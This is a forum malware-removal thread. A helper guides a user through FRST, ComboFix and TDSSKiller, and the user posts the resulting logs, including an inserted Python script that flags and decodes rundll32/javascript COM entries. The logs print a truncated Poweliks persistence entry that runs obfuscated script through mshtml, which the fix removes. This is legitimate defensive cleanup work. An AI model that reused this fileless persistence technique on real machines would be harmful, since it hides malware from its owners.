    2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00015873.tmp
    2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00003273.tmp
    2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00003145.tmp
    2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00003124.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00032536.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00032139.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00031035.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00030934.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00030827.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00030618.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00030117.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00024058.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00023025.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00023002.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00021308.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00016419.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00011739.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00011697.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00010722.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00009744.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00002782.tmp
    2014-11-10 16:28 - 2014-11-10 16:28 - 01176168 ____T () C:\windows\SysWOW64\00010043.tmp
    CustomCLSID: HKU\S-1-5-21-708974729-55146766-922195683-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
    CMD: ipconfig /flushdns
    CMD: netsh winsock reset all
    CMD: netsh int ipv4 reset
    CMD: netsh int ipv6 reset
    EmptyTemp:
    end
  • Click File > Save As and type fixlist.txt as the File Name.
  • Important: The file must be saved in the same location as FRST64.exe.

NOTICE: This script is intended for use on this particular machine. Do not use this script on any other machine; doing so may cause damage to your Operating System.

  • Right-Click FRST64.exe and select Run as administrator to run the programme.
  • Click Fix.
  • A log (Fixlog.txt) will open on your desktop. Copy the contents of the log and paste in your next reply.
     

STEP 2
ComboFix

  • Note: Please read through these instructions before running ComboFix. 
  • Please download ComboFix and save the file to your Desktop. << Important!
  • Temporarily disable your anti-virus software. For instructions, please refer to the following link.
  • Right-Click ComboFix.exe and select Run as administrator to run the programme.
  • Follow the prompts.
  • Allow ComboFix to complete its removal routine (please refer to Important Notes:).
  • Upon completion, a log (ComboFix.txt) will be created in the root directory (C:\). Copy the contents of the log and paste in your next reply.
  • Re-enable your anti-virus software.
     

Important Notes:

  • Do NOT mouse click ComboFix's window whilst it is running. This may cause the programme to stall.
  • Do NOT use your computer whilst ComboFix is running.
  • Your Desktop/taskbar may disappear whilst ComboFix is running; this is normal.
     
  • If you get the message Illegal operation attempted on registry key that has been marked for deletion please reboot your computer.
  • ComboFix will disconnect your machine from the Internet as soon as it starts.
  • Please do not attempt to re-connect your machine back to the Internet until ComboFix has completely finished.
  • If you are unable to access the Internet after running ComboFix, please reboot your computer. 
     

STEP 3
TDSSKiller Scan

  • Please download TDSSKiller and save the file to your Desktop.
  • Right-Click TDSSKiller.exe and select Run as administrator to run the programme.
  • Click Change parameters. Place a checkmark next to:
    • Loaded Modules
    • Detect TDLFS file system
    • Verify file digital signatures
  • Note: If you receive the following message: Extended Monitoring Driver is required, click Reboot now, and continue from here following the reboot.
  • Click Start Scan. Do not use the computer during the scan.
  • If objects are found, change the action to skip.
  • Click Continue and close the window.
  • A log will be created and saved to the root directory (usually C:\). Attach (not copy/paste) the log in your next reply.
     

======================================================
 
STEP 4
Logs
In your next reply please include the following logs. Please be sure to copy and paste the requested logs, as well as provide information on any questions I may have asked.

  • Fixlog.txt
  • ComboFix.txt
  • TDSSKiller log (attached!)

Would you like to help others with malware removal? Join our Classroom and learn how!
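The entry flagged in the fixlist above is a per-user LocalServer32 value whose command is rundll32.exe with a javascript: argument, and that pattern can be picked out of an FRST log automatically. The following is an added example, not part of the original posts and not FRST's own code; the sample lines are constructed (zeroed SIDs and CLSIDs around the command fragment as the log shows it), and the function names are hypothetical.

```python
import re
from typing import NamedTuple

# Constructed sample in the FRST line format seen in this thread. SIDs, CLSIDs
# and the "Example" entries are placeholders; the rundll32 command text is the
# truncated fragment exactly as the log prints it.
SAMPLE_LOG = r"""
HKLM\...\Run: [ExampleUpdater] => C:\Program Files\Example\updater.exe [12345 2014-01-01] (Example Corp)
CustomCLSID: HKU\S-1-5-21-0-0-0-1000_Classes\CLSID\{00000000-0000-0000-0000-000000000001}\InprocServer32 -> C:\Users\Owner\AppData\Local\Example\shellext.dll (Example Corp)
CustomCLSID: HKU\S-1-5-21-0-0-0-1000_Classes\CLSID\{00000000-0000-0000-0000-000000000002}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
HKU\S-1-5-21-0-0-0-1000\...000000000002}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
"""

# A COM server registration: registry key ending in LocalServer32 or
# InprocServer32, then FRST's separator ("->" or ":"), then the value data.
SERVER_VALUE = re.compile(
    r'(?P<key>HK\S*?\\(?P<server>LocalServer32|InprocServer32))'
    r'\s*(?:->|:)\s*(?P<data>.*)',
    re.IGNORECASE)
RUNDLL32 = re.compile(r'^"?(?:[a-z]:\\[^"]*\\)?rundll32(?:\.exe)?\b', re.IGNORECASE)
SCRIPT_PROTOCOL = re.compile(r'\b(?:javascript|vbscript):', re.IGNORECASE)
EVAL_ARG = re.compile(r'eval\("([^"\s]+)')


class Finding(NamedTuple):
    key: str
    reasons: tuple
    decoded_preview: str


def unshift(text, shift=1):
    """Lower every character code by `shift` (inverse of a fixed +shift encoding)."""
    return ''.join(chr(ord(c) - shift) for c in text)


def triage(log_text):
    """Return a Finding for each COM server value that launches a script host."""
    findings = []
    for line in log_text.splitlines():
        match = SERVER_VALUE.search(line)
        if not match:
            continue
        # Drop the helper annotation FRST appends after "<====".
        data = match.group('data').split('<====')[0].strip()
        reasons = []
        # A legitimate server value is a path to an EXE or DLL, not a script URL.
        if RUNDLL32.search(data) and SCRIPT_PROTOCOL.search(data):
            reasons.append('rundll32 launched with a script-protocol argument')
        if 'mshtml,runhtmlapplication' in data.lower():
            reasons.append('mshtml RunHTMLApplication invoked from a COM server value')
        if not reasons:
            continue
        # The fragment visible in this thread becomes readable when each
        # character code is lowered by one; a shift of 1 is an assumption
        # taken from that fragment, other samples may be encoded differently.
        arg = EVAL_ARG.search(data)
        preview = unshift(arg.group(1)) if arg else ''
        findings.append(Finding(match.group('key'), tuple(reasons), preview))
    return findings


if __name__ == '__main__':
    for finding in triage(SAMPLE_LOG):
        print(finding.key)
        for reason in finding.reasons:
            print('  -', reason)
        print('  decoded start of eval() argument:', finding.decoded_preview)
```

Only the part of the value that the log prints is decoded; the characters FRST elides are not reconstructed.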


#3 suefiza

Posted 01 December 2014 - 04:23 PM

Thank you Adam, I'm Sue. I will read through this material and consider my options. I hope to reply again after work on Tuesday.

#4 LiquidTension

Posted 02 December 2014 - 01:44 AM

Hello Sue, 

 

That's quite alright. 

I would keep the machine disconnected from the Internet until you've made your decision. 



#5 suefiza

Posted 02 December 2014 - 04:49 PM

Adam, I want to share how I normally use my computer.  It is for personal use, so the only liability is to myself and my boyfriend.  I do online banking, social networking, online shopping, playing music and Netflix, Youtube or similar types of streaming.  I don't do any gaming.  I do not VPN into my employer's network on my personal PC.  My boyfriend and I have had a bad habit of leaving the computer up and connected to the internet night and day, especially on weekends when he uses Facebook and a couple of Amazon chatrooms for social media all hours of the day and night.  I have saved off my documents and pictures.  I need to check the videos to make sure they are backed up.  After that I would like to try running through removal of the malware/infection.  If the problem is reintroduced, then I would consider a complete wipe and reload.  I don't anticipate needing help through the steps, I'm familiar with running code, but it's nice to know that you are available to help if something weird happens.  I hope to start working on the removal tonight around 6:30pm CST.  Do you have any suggestions or recommendations before I jump into it?  FYI, I have stayed unconnected to my internet from my personal PC since I opened this topic.



#6 LiquidTension

Posted 02 December 2014 - 06:14 PM

Hi Sue, 

 

That sounds fine. 

Work your way through step by step, and let me know if you run into any difficulties. 



#7 suefiza

Posted 02 December 2014 - 08:26 PM

I ran fixlist.txt script, it still appears to be running.  It's been 2 hours.  I see a fixlog.  It was written 2 hours ago and doesn't appear to have been modified recently.  Is it normal for this to run this long?  I opened fixlog, the last thing I see is the following.  Is it done, should I kill FarBar?  If it is indeed finished, I will post the entire fixlog file, but for now, I'm just wondering why it seems to be hanging. Thanks.

 

=========  netsh int ipv4 reset =========

Reseting Global, OK!
Reseting Interface, OK!
Reseting Unicast Address, OK!
Reseting Route, OK!
Restart the computer to complete this action.

========= End of CMD: =========

=========  netsh int ipv6 reset =========

Reseting Interface, OK!
Restart the computer to complete this action.

========= End of CMD: =========



#8 suefiza

Posted 02 December 2014 - 09:13 PM

FarBar stopped responding, so I killed it.  I am posting Run #1 here.  I reran it, and will post Run #2 in the next posting.

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 02-12-2014
Ran by Owner at 2014-12-02 18:42:28 Run:1
Running from C:\Users\Owner\Desktop
Loaded Profile: Owner (Available profiles: Owner)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
start
HKLM\...\Run: [] => [X]
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-708974729-55146766-922195683-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
URLSearchHook: HKU\S-1-5-21-708974729-55146766-922195683-1000 - Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
SearchScopes: HKU\S-1-5-21-708974729-55146766-922195683-1000 -> DefaultScope {9C687E47-1977-4703-A481-C8CABB96E47A} URL = http://start.funmood...&q={searchTerms}
SearchScopes: HKU\S-1-5-21-708974729-55146766-922195683-1000 -> {9C687E47-1977-4703-A481-C8CABB96E47A} URL = http://start.funmood...&q={searchTerms}
SearchScopes: HKU\S-1-5-21-708974729-55146766-922195683-1000 -> {A531D99C-5A22-449b-83DA-872725C6D0ED} URL = http://search.alot.c...on=1.1.3001.0(B)
BHO-x32: &Yahoo! Toolbar Helper -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
Toolbar: HKLM-x32 - Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [Not Found]
CHR HomePage: Default -> hxxp://start.funmoods.com/?f=1&a=axl
CHR HKLM-x32\...\Chrome\Extension: [fdloijijlkoblmigdofommgnheckmaki] - C:\Program Files (x86)\Funmoods\funmoods\1.5.11.16\funmoodsOEM.crx [2014-10-04]
C:\Program Files (x86)\Funmoods
2014-11-30 15:17 - 2014-11-30 15:17 - 00000000 ____D () C:\Users\Owner\AppData\Local\{E1942AFD-BAA2-4C6F-8B54-71A4F500BF59}
2014-11-21 19:24 - 2014-11-21 19:24 - 00000000 ____D () C:\Users\Owner\AppData\Roaming\UpdaterEX
CustomCLSID: HKU\S-1-5-21-708974729-55146766-922195683-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CMD: ipconfig /flushdns
CMD: netsh winsock reset all
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
EmptyTemp:
end
*****************

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
"HKU\S-1-5-21-708974729-55146766-922195683-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-708974729-55146766-922195683-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
HKU\S-1-5-21-708974729-55146766-922195683-1000\Software\Microsoft\Internet Explorer\URLSearchHooks\\{EF99BD32-C1FB-11D2-892F-0090271D4F88} => value deleted successfully.
"HKCR\Wow6432Node\CLSID\{EF99BD32-C1FB-11D2-892F-0090271D4F88}" => Key deleted successfully.
HKU\S-1-5-21-708974729-55146766-922195683-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
"HKU\S-1-5-21-708974729-55146766-922195683-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9C687E47-1977-4703-A481-C8CABB96E47A}" => Key deleted successfully.
"HKCR\CLSID\{9C687E47-1977-4703-A481-C8CABB96E47A}" => Key not found.
"HKU\S-1-5-21-708974729-55146766-922195683-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{A531D99C-5A22-449b-83DA-872725C6D0ED}" => Key deleted successfully.
"HKCR\CLSID\{A531D99C-5A22-449b-83DA-872725C6D0ED}" => Key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4efb-9B51-7695ECA05670}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{02478D38-C3F9-4efb-9B51-7695ECA05670}" => Key deleted successfully.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{EF99BD32-C1FB-11D2-892F-0090271D4F88} => value deleted successfully.
"HKCR\Wow6432Node\CLSID\{EF99BD32-C1FB-11D2-892F-0090271D4F88}" => Key not found.
C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} not found.
Chrome HomePage deleted successfully.
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\fdloijijlkoblmigdofommgnheckmaki" => Key deleted successfully.
"C:\Program Files (x86)\Funmoods\funmoods\1.5.11.16\funmoodsOEM.crx" => File/Directory not found.
"C:\Program Files (x86)\Funmoods" => File/Directory not found.
C:\Users\Owner\AppData\Local\{E1942AFD-BAA2-4C6F-8B54-71A4F500BF59} => Moved successfully.
C:\Users\Owner\AppData\Roaming\UpdaterEX => Moved successfully.
"HKU\S-1-5-21-708974729-55146766-922195683-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.

=========  ipconfig /flushdns =========

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========

=========  netsh winsock reset all =========

Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.

========= End of CMD: =========

=========  netsh int ipv4 reset =========

Reseting Global, OK!
Reseting Interface, OK!
Reseting Unicast Address, OK!
Reseting Route, OK!
Restart the computer to complete this action.

========= End of CMD: =========

=========  netsh int ipv6 reset =========

Reseting Interface, OK!
Restart the computer to complete this action.

========= End of CMD: =========



#9 suefiza

Posted 02 December 2014 - 09:15 PM

Farbar Run #2. It looks like after it completed, all the way this time, it removed the fixlist.txt that had been on my desktop.

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 02-12-2014
Ran by Owner at 2014-12-02 21:04:24 Run:2
Running from C:\Users\Owner\Desktop
Loaded Profile: Owner (Available profiles: Owner)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
start
HKLM\...\Run: [] => [X]
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-708974729-55146766-922195683-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
URLSearchHook: HKU\S-1-5-21-708974729-55146766-922195683-1000 - Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
SearchScopes: HKU\S-1-5-21-708974729-55146766-922195683-1000 -> DefaultScope {9C687E47-1977-4703-A481-C8CABB96E47A} URL = http://start.funmood...&q={searchTerms}
SearchScopes: HKU\S-1-5-21-708974729-55146766-922195683-1000 -> {9C687E47-1977-4703-A481-C8CABB96E47A} URL = http://start.funmood...&q={searchTerms}
SearchScopes: HKU\S-1-5-21-708974729-55146766-922195683-1000 -> {A531D99C-5A22-449b-83DA-872725C6D0ED} URL = http://search.alot.c...on=1.1.3001.0(B)
BHO-x32: &Yahoo! Toolbar Helper -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
Toolbar: HKLM-x32 - Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [Not Found]
CHR HomePage: Default -> hxxp://start.funmoods.com/?f=1&a=axl
CHR HKLM-x32\...\Chrome\Extension: [fdloijijlkoblmigdofommgnheckmaki] - C:\Program Files (x86)\Funmoods\funmoods\1.5.11.16\funmoodsOEM.crx [2014-10-04]
C:\Program Files (x86)\Funmoods
2014-11-30 15:17 - 2014-11-30 15:17 - 00000000 ____D () C:\Users\Owner\AppData\Local\{E1942AFD-BAA2-4C6F-8B54-71A4F500BF59}
2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00024618.tmp
2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00015427.tmp
2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00011764.tmp
2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00011583.tmp
2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00011416.tmp
2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00009629.tmp
2014-11-28 17:37 - 2014-11-28 17:37 - 40034920 ____T () C:\windows\SysWOW64\00024044.tmp
2014-11-28 17:37 - 2014-11-28 17:37 - 40034920 ____T () C:\windows\SysWOW64\00010878.tmp
2014-11-28 17:37 - 2014-11-28 17:37 - 40034920 ____T () C:\windows\SysWOW64\00004843.tmp
2014-11-21 19:24 - 2014-11-21 19:24 - 00000000 ____D () C:\Users\Owner\AppData\Roaming\UpdaterEX
CustomCLSID: HKU\S-1-5-21-708974729-55146766-922195683-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CMD: ipconfig /flushdns
CMD: netsh winsock reset all
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
EmptyTemp:
end
*****************

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\ => Value not found.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => Value not found.
"HKU\S-1-5-21-708974729-55146766-922195683-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key not found.
"HKU\S-1-5-21-708974729-55146766-922195683-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
HKU\S-1-5-21-708974729-55146766-922195683-1000\Software\Microsoft\Internet Explorer\URLSearchHooks\\{EF99BD32-C1FB-11D2-892F-0090271D4F88} => Value not found.
HKU\S-1-5-21-708974729-55146766-922195683-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
"HKU\S-1-5-21-708974729-55146766-922195683-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9C687E47-1977-4703-A481-C8CABB96E47A}" => Key not found.
"HKCR\CLSID\{9C687E47-1977-4703-A481-C8CABB96E47A}" => Key not found.
"HKU\S-1-5-21-708974729-55146766-922195683-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{A531D99C-5A22-449b-83DA-872725C6D0ED}" => Key not found.
"HKCR\CLSID\{A531D99C-5A22-449b-83DA-872725C6D0ED}" => Key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4efb-9B51-7695ECA05670}" => Key not found.
"HKCR\Wow6432Node\CLSID\{02478D38-C3F9-4efb-9B51-7695ECA05670}" => Key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{EF99BD32-C1FB-11D2-892F-0090271D4F88} => Value not found.
"HKCR\Wow6432Node\CLSID\{EF99BD32-C1FB-11D2-892F-0090271D4F88}" => Key not found.
C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} not found.
Chrome HomePage not detected.
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\fdloijijlkoblmigdofommgnheckmaki" => Key not found.
"C:\Program Files (x86)\Funmoods\funmoods\1.5.11.16\funmoodsOEM.crx" => File/Directory not found.
"C:\Program Files (x86)\Funmoods" => File/Directory not found.
"C:\Users\Owner\AppData\Local\{E1942AFD-BAA2-4C6F-8B54-71A4F500BF59}" => File/Directory not found.
"C:\Users\Owner\AppData\Roaming\UpdaterEX" => File/Directory not found.
"HKU\S-1-5-21-708974729-55146766-922195683-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.

=========  ipconfig /flushdns =========

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========

=========  netsh winsock reset all =========

Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.

========= End of CMD: =========

=========  netsh int ipv4 reset =========

Reseting Interface, OK!
Restart the computer to complete this action.

========= End of CMD: =========

=========  netsh int ipv6 reset =========

Reseting Interface, OK!
Restart the computer to complete this action.

========= End of CMD: =========

EmptyTemp: => Removed 484 KB temporary data.

The system needed a reboot.

==== End of Fixlog ====



#10 suefiza

Posted 02 December 2014 - 09:45 PM

Combofix log:

ComboFix 14-12-02.01 - Owner 12/02/2014  21:24:07.1.4 - x64
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.6051.4077 [GMT -6:00]
Running from: c:\users\Owner\Desktop\ComboFix.exe
AV: Norton 360 *Disabled/Updated* {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
FW: Norton 360 *Enabled* {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
SP: Norton 360 *Enabled/Updated* {631E4324-D31C-783F-EC5C-35AD42B18466}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 * Created a new restore point
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\programdata\Roaming
c:\windows\msdownld.tmp
.
.
(((((((((((((((((((((((((   Files Created from 2014-11-03 to 2014-12-03  )))))))))))))))))))))))))))))))
.
.
2014-12-03 03:36 . 2014-12-03 03:36 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-11-30 23:10 . 2014-12-03 03:04 -------- d-----w- C:\FRST
2014-11-22 02:28 . 2014-11-22 02:28 -------- d-----w- c:\users\Owner\AppData\Local\Macromedia
2014-11-22 01:41 . 2014-11-22 01:41 -------- d-----w- c:\users\Owner\AppData\Local\Mozilla
2014-11-20 00:39 . 2014-11-11 03:08 241152 ----a-w- c:\windows\system32\pku2u.dll
2014-11-20 00:39 . 2014-11-11 03:08 728064 ----a-w- c:\windows\system32\kerberos.dll
2014-11-20 00:39 . 2014-11-11 02:44 186880 ----a-w- c:\windows\SysWow64\pku2u.dll
2014-11-20 00:39 . 2014-11-11 02:44 550912 ----a-w- c:\windows\SysWow64\kerberos.dll
2014-11-16 14:24 . 2014-11-16 14:24 -------- d-----w- C:\N360_BACKUP
2014-11-16 13:44 . 2014-11-16 13:44 -------- d-----w- c:\program files (x86)\UEFI WinFlash
2014-11-13 01:01 . 2014-11-13 01:01 -------- d-sh--w- c:\users\Owner\AppData\Local\EmieBrowserModeList
2014-11-11 20:48 . 2014-11-05 17:56 304640 ----a-w- c:\windows\system32\generaltel.dll
2014-11-11 20:48 . 2014-11-05 17:56 228864 ----a-w- c:\windows\system32\aepdu.dll
2014-11-11 20:48 . 2014-11-05 17:52 424448 ----a-w- c:\windows\system32\aeinv.dll
2014-11-11 20:48 . 2014-10-14 02:13 683520 ----a-w- c:\windows\system32\termsrv.dll
2014-11-11 20:48 . 2014-10-14 02:16 155064 ----a-w- c:\windows\system32\drivers\ksecpkg.sys
2014-11-11 20:48 . 2014-10-14 02:12 1460736 ----a-w- c:\windows\system32\lsasrv.dll
2014-11-11 20:48 . 2014-10-14 02:09 146432 ----a-w- c:\windows\system32\msaudite.dll
2014-11-11 20:48 . 2014-10-14 02:07 681984 ----a-w- c:\windows\system32\adtschema.dll
2014-11-11 20:48 . 2014-10-14 01:50 22016 ----a-w- c:\windows\SysWow64\secur32.dll
2014-11-11 20:48 . 2014-10-14 01:49 96768 ----a-w- c:\windows\SysWow64\sspicli.dll
2014-11-11 20:48 . 2014-10-14 01:47 146432 ----a-w- c:\windows\SysWow64\msaudite.dll
2014-11-11 20:48 . 2014-10-14 01:46 681984 ----a-w- c:\windows\SysWow64\adtschema.dll
2014-11-11 20:45 . 2014-08-21 06:43 1882624 ----a-w- c:\windows\system32\msxml3.dll
2014-11-11 20:44 . 2014-10-25 01:57 77824 ----a-w- c:\windows\system32\packager.dll
2014-11-11 20:44 . 2014-10-25 01:32 67584 ----a-w- c:\windows\SysWow64\packager.dll
2014-11-11 20:44 . 2014-10-10 00:57 3198976 ----a-w- c:\windows\system32\win32k.sys
2014-11-11 20:44 . 2014-10-14 02:13 3241984 ----a-w- c:\windows\system32\msi.dll
2014-11-11 20:44 . 2014-10-14 01:50 2363904 ----a-w- c:\windows\SysWow64\msi.dll
2014-11-11 20:44 . 2014-10-18 02:05 861696 ----a-w- c:\windows\system32\oleaut32.dll
2014-11-11 20:44 . 2014-10-18 01:33 571904 ----a-w- c:\windows\SysWow64\oleaut32.dll
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-11-27 17:22 . 2012-04-17 22:51 701104 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2014-11-27 17:22 . 2011-08-15 11:10 71344 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-11-13 00:30 . 2011-07-18 00:47 103374192 ----a-w- c:\windows\system32\MRT.exe
2014-09-25 02:08 . 2014-10-01 19:22 371712 ----a-w- c:\windows\system32\qdvd.dll
2014-09-25 01:40 . 2014-10-01 19:22 519680 ----a-w- c:\windows\SysWow64\qdvd.dll
2014-09-24 03:39 . 2012-05-10 21:41 505416 ----a-w- c:\windows\SysWow64\msvcp71.dll
2014-09-24 03:39 . 2012-05-10 21:41 353864 ----a-w- c:\windows\SysWow64\msvcr71.dll
2014-09-09 22:11 . 2014-09-23 22:04 2048 ----a-w- c:\windows\system32\tzres.dll
2014-09-09 21:47 . 2014-09-23 22:04 2048 ----a-w- c:\windows\SysWow64\tzres.dll
2014-09-04 05:23 . 2014-10-17 23:20 424448 ----a-w- c:\windows\system32\rastls.dll
2014-09-04 05:04 . 2014-10-17 23:20 372736 ----a-w- c:\windows\SysWow64\rastls.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
